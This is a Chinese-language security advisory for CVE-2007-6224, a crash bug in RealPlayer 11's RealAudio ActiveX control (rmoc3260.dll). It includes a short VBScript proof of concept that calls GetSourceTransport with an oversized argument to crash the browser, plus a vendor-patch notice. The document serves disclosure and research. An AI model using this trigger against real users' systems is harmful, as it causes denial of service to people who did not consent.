发布日期：2007-11-30
更新日期：2007-12-07

受影响系统：

Real Networks RealPlayer 11

描述：

---

BUGTRAQ  ID: 26660
CVE(CAN) ID: CVE-2007-6224

RealPlayer是一款流行的媒体播放器，支持多种文件格式。

RealPlayer的RealAudioObjects.RealAudio ActiveX控件实现上存在输入验证漏洞，远程攻击者可能利用此漏洞导致浏览器崩溃。

RealPlayer所安装的RealAudioObjects.RealAudio（rmoc3260.dll）ActiveX控件中没有正确地验证对GetSourceTransport()函数的某些输入，如果用户受骗访问了恶意网页的话并在该函数中触发异常的话，就可能导致浏览器崩溃。

<*来源：Adonis
  
  链接：http://marc.info/?l=bugtraq&m=119643976029027&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' />
<script language='vbscript'>

targetFile = "C:\Windows\system32\rmoc3260.dll"
prototype  = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As String"
memberName = "GetSourceTransport"
progid     = "RealAudioObjects.RealAudio"
argCount   = 1

arg1=32767

target.GetSourceTransport arg1

</script></job></package>

建议：

---

厂商补丁：

Real Networks
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.real.com

浏览次数：2632
严重程度：0（网友投票）